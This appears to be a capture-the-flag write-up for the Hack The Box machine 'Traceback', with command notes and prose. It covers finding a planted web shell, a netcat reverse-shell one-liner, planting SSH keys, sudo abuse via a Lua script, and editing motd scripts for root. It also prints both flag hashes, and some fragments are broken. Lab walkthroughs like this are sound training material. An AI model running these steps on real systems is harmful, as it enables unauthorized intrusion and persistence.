sudo vim /etc/hosts
#add traceback.htb
nmap -T4 -p- -A -Pn -v traceback.htb
gobuster dir -u http://traceback.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,bak,js,txt,json,docx,pdf,zip,aspx,sql,xml -t 50
#search for uploaded webshells
ffuf -u http://traceback.htb/FUZZ -w /usr/share/wordlists/seclists/Web-Shells/backdoor_list.txt
#this gives us smevk.php
nc -nvlp 4444
#execute reverse shell one-liner
which python3
#upgrade to stable shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
#use Ctrl+Z to background shell
stty raw -echo; fg
#press enter twice
ls -la /opt
ls -la /home
ls -la /home/webadmin
cd /home/webadmin
#check note and .bash_history
ls -la .ssh
#we can add our authorized keys here
#in attacker machine
ssh-keygen -f webadmin
#generates webadmin and
#copy public key
#paste it in webadmin .ssh
echo "ssh-rsa ... " > .ssh/authorized_keys
#now we can login via SSH
ssh -i webadmin [email protected]
#in attacker machine
python3 -m http.server
#in ssh
chmod +x
sudo -l
#we can run luvit program as 'sysadmin' user
sudo -u sysadmin /home/sysadmin/luvit
#we can exit this
#command from .bash_history
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
#this gives traceback error
#create program to write SSH key for sysadmin
#in attacker machine
ssh-keygen -f sysadmin
#copy public key
vim writekeys.lua
#program to write to /home/sysadmin/.ssh/authorized_keys
python3 -m http.server
#in ssh session
sudo -u sysadmin /home/sysadmin/luvit writekeys.lua
#executed without error
#ssh as sysadmin
ssh -i sysadmin [email protected]
#use bash shell
ls -la
#get user flag
#run linpeas
ls -la /etc/update-motd.d/
#these files are writable
#we can make them print root flag
cd /etc/update-motd.d/
vi 00-header
#delete the message line
#and enter 'cat /root/root.txt'
#in a new tab, log into SSH
#get root flag printed
ssh -i sysadmin [email protected]
file ="/home/sysadmin/.ssh/authorized_keys", "a")
Open ports & services:
- 22 - ssh - OpenSSH 7.6p1 (Ubuntu)
- 80 - http - Apache httpd 2.4.29
Checking the webpage, it seems to be 'owned'; furthermore, it mentions that it has left a backdoor.
Going through the source code of the webpage, we can see a comment - "Some of the best web shells that you might need"
We can begin to scan the web directories using
to check for clues. -
From the info enumerated on webpage so far, we can see that there is a backdoor uploaded - we can attempt to fuzz it using
. -
For this fuzzing operation, we can use a wordlist specifically made for webshells and backdoors.
Googling the comment we found earlier gives us this repo
We can create a wordlist using these webshell names; alternatively we can use the
wordlist fromseclists
. -
, we can search for the webshell; we get a file 'smevk.php' with status code 200. -
Visiting /smevk.php, we are greeted with a login page for the backdoor - we can check this webshell from the repo found earlier and we get the creds "admin:admin".
We can login using these creds, giving us access to the backdoor dashboard.
This contains a field for 'Execute', and we can execute commands here.
We can setup a listener, and execute the reverse-shell liner command here to get reverse shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 4444 >/tmp/f
We now get shell as 'webadmin'; we can stabilize our shell now.
We have a home directory for webadmin, we can check that out.
The home directory contains 'note.txt', which suggests the presence of a
tool. -
There is also webadmin's '.bash_history' file, which shows there is a file 'privesc.lua' in another user's (sysadmin) home directory.
Now, there is a .ssh folder with empty 'authorized_keys'; we can add our own here in order to login via SSH.
Once we login via SSH, we can check for privesc vectors using
. -
sudo -l
, we can see that we can run '/home/sysadmin/luvit' as 'sysadmin' user. -
We know that the .bash_history file contained a 'sudo' command run as sysadmin, and it included a .lua file.
So, with the help of the script, we can also run our own .lua files.
We can create a .lua program to write our SSH keys into sysadmin's .ssh folder, similar to how we did with webadmin.
We do not need to use
chmod 600
in this case as the authorized_keys file would already exist. -
After writing the Lua script, we can transfer it to the victim SSH session, and run it using
program. -
Then, we can login as sysadmin via SSH, and get user flag.
as sysadmin user shows some interesting group writable files. -
The message-of-the-day files in '/etc/update-motd.d/' files are group-writable - we can use that to our advantage.
The '00-header' file is printed every time someone logs in via SSH, so we can edit this to print root flag.
We can get root flag by logging into SSH in a new tab.
1. User flag - 22a716001f74b092a8e9810d993948cd
2. Root flag - 76a1155af3a5f5d3e9084e2c87eeb104